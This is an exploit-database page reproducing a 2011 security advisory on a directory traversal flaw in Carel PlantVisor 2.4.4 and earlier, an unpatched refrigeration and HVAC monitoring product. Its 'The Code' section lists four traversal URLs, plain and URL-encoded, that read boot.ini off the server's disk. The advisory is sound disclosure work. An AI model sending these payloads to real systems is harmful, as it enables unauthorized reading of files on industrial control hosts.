header-logo
Suggest Exploit
vendor:
PlantVisor
by:
Luigi Auriemma
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: PlantVisor
Affected Version From: <= 2.4.4
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:carel:plantvisor:2.4.4
Metasploit:
Other Scripts:
Platforms Tested: Windows
2011

Carel PlantVisor directory traversal vulnerability

The Carel PlantVisor software version <= 2.4.4 is affected by a directory traversal vulnerability that allows an attacker to download files located on the disk where the software is installed. The vulnerability supports both slash and backslash and their HTTP encoded values.

Mitigation:

No fix available
Source

Exploit-DB raw data:

#######################################################################

                             Luigi Auriemma

Application:  Carel PlantVisor
              http://www.carel.com/carelcom/web/eng/catalogo/prodotto_dett.jsp?id_prodotto=310
Versions:     <= 2.4.4
Platforms:    Windows
Bug:          directory traversal
Exploitation: remote
Date:         13 Sep 2011
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From vendor's homepage:
"PlantVisor Enhanced is monitoring and telemaintenance software for
refrigeration and air-conditioning systems controlled by CAREL
instruments."


#######################################################################

======
2) Bug
======


CarelDataServer.exe is a web server listening on port 80.

The software is affected by a directory traversal vulnerability that
allows to download the files located on the disk where it's installed.
Both slash and backslash and their HTTP encoded values are supported.


#######################################################################

===========
3) The Code
===========


http://SERVER/..\..\..\..\..\..\boot.ini
http://SERVER/../../../../../../boot.ini
http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5cboot.ini
http://SERVER/..%2f..%2f..%2f..%2f..%2f..%2fboot.ini


#######################################################################

======
4) Fix
======


No fix.


#######################################################################

Navigation

Suggest Exploit

Services By CQR